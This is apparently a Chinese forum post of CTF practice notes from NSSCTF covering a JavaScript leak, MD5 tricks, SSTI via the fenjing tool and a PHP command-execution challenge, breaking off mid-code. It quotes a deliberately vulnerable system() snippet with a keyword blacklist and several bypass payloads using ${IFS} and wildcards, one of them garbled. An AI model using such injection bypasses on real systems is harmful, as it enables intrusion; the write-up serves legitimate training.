IT评测·应用市场-qidao123.com技术社区
标题:
NSSCTF刷题篇1
[打印本页]
作者:
络腮胡菲菲
时间:
2024-9-26 18:14
标题:
NSSCTF刷题篇1
js范例
[SWPUCTF 2022 新生赛]js_sign
这是一道js信息泄漏的题目直接检察源码,有一个main.js文件点击之后,有一串数字和一段base64编码,解开base64编码得到这个编码为敲击码
解码在线网站:Tap Code - 许愿星 (wishingstarmoye.com)
注意要将数字之间的空格去掉
[MoeCTF 2021]2048
检察源代码
找到
req.open("GET","flag.php?score="+obj.score,true);
复制代码
这行代码然后直接
得到flag
md5范例
[SWPUCTF 2022 新生赛]奇妙的MD5
第一关特殊的字符串ffifdyop
第二第三关数组绕过
ssti模板注入
[安洵杯 2020]Normal SSTI
第一种方法
fenjing一把嗦
执行fenjing下令
python -m fenjing webui
复制代码
然后填写网址一把嗦
下令执行
[MoeCTF 2021]babyRCE
检察源代码
<?php
$rce = $_GET['rce'];
if (isset($rce)) {
if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|"/i", $rce)) {
system($rce);
}else {
echo "hhhhhhacker!!!"."\n";
}
} else {
highlight_file(__FILE__);
}
复制代码
一个下令执行主要排除了一些打开文件的下令另有空格,这里使用下面的下令进行绕过
?rce=uniq${IFS}fla?.php
?rce=c\at${IFS}fl\ag.php
?rce=ls|grepIFSf∣xargsIFSf∣xargs{IFS}-iIFScpIFScp{IFS}{}${IFS}t.txt
复制代码
应该另有很多下令就不在列举,至于flag的名字可以直接ls进行检察,并没有克制ls
[FSCTF 2023]webshell是啥捏
源码
[code] <?php
highlight_file(__FILE__);
$
欢迎光临 IT评测·应用市场-qidao123.com技术社区 (https://dis.qidao123.com/)
Powered by Discuz! X3.4